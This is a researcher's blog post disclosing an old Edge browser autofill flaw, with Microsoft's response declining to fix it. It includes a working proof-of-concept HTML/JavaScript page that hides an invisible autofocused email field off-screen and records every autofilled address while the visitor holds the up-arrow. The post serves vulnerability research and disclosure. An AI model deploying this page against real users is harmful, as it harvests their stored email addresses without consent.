folder Filed in General, Researches
Edge browser press and hold up-arrow for a second all your emails disclosed
Seif Elsallamy comment 0 Comments access_time 3 min read

Hello Everyone, I’m Seif Elsallamy an Application Penetration Tester at @Seekurity

First of all, this is a very old blog post (the issue was originally discovered back in 2017) but we thought it might be useful to publish it hope it helps someone else in their research.

If you’re an Edge user you should be aware that your data may be disclosed easily by a simple button press

I was really surprised and shocked when I found this bug affecting Edge because It can be found easily It requires a small amount of effort and a bit of javascript for exploiting

When you’re visiting a website for the first time and signup when you click on the email field you may see a list of your email addresses by clicking the up or down arrow
you should move through this email list to choose the preferred email address for signup

You may try pressing and hold up-arrow for a second you will move through all the email list
So I think it’s now clear,

By a simple autofocus and onchange event (a javascript event) any website can catch all your emails or your stored data:

  • So Bob uses Edge
  • Bob likes playing car games
  • Bob has many emails
  • Bob moves the car with up-arrow
  • all Bob emails got leaked 🙁

 

Fun time:

<body style="overflow:hidden;">
<h1> press and hold up-arrow for a second </h1>
<script>

var a = [];

function disclose(){
var x = document.getElementById('e').value;
a.push(x);

if (x==="") {

alert("your disclosed info:\n "+a);

}

}

window.setTimeout(function(){
window.scrollTo(0, 0);
}, 100);

</script>

<form style="margin-top:1000px;opacity:0;" action="javascript://" method="post">
<input id="e" autofocus onchange="disclose();" name="email" />
<button>submit</button>
</form>
</body>

By executing the above HTML code on Edge browser press and hold arrow-up for a second all your disclosed emails will appear

 

Reported this issue to Microsoft and they responded with the following:

Hello,

Thank you for contacting the Microsoft Security Response Center (MSRC).  Upon investigation, we have determined that this does not meet the bar for security servicing as it would require a user to visit a non-Microsoft-owned domain, use Edge to fill in their credentials, and then submit them in order to exploit themselves.

For an in-depth discussion of what constitutes a product vulnerability please see the following:

“Definition of a Security Vulnerability”
<https://technet.microsoft.com/library/cc751383.aspx>

Again, we appreciate your report.

Regards,

Karl
MSRC

 

However, you should be aware of this issue if you’re using Edge and oh, I forgot to say that it may disclose your passwords under certain circumstances.

 

Leave a Reply

Your email address will not be published. Required fields are marked *


Cancel Post Comment

Translate this blog